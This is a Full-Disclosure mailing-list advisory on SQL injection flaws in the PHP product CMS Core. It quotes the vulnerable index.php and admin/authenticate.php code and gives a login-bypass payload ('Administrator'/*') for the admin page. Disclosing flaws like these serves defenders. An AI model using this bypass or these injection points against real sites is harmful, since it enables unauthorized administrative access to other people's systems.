[Full-Disclosure] CMScore advisory

["GHC vision" <foster@xxxxxx>]

SQL injection bugs in CMScore

<img src="http://www.ghc.ru/images/logo.jpg";>

/*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[1] script name: index.php

---[code]---
$EntryID=$_GET['EntryID'];
...
$article="SELECT * FROM CMS_articles where EntryID='$EntryID'";
---[/code]---

Possible SQL injection: 
http://CMScore/index.php?EntryID=[SQL code]

[2]  script name: index.php

---[code]---
$searchterm=$_POST['searchterm'];
...
$newselect="Select * FROM CMS_articles where title LIKE '%$searchterm%' OR 
shortdescription 
LIKE '%$searchterm%' OR body LIKE '%$searchterm%' order by EntryID DESC LIMIT 
$start, 
$numentries";
---[/code]---

Possible SQL injection through $searchterm variable from Search Form.

[3] script name: admin/authenticate.php

---[code]---
  $username=$_POST['username'];
  $password=$_POST['password'];
  $password=md5($password);
  $query = "select * from CMS_logintable where username='$username' and 
password='$password'"; 
  $result=mysql_query($query) or die("Could not Query");
---[/code]---

Possible SQL injection through $username variable.

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

[note]
"Administrator" must be a valid user name.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4            */
/* & all quest hunters %)                             */
/* ================================================== */

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html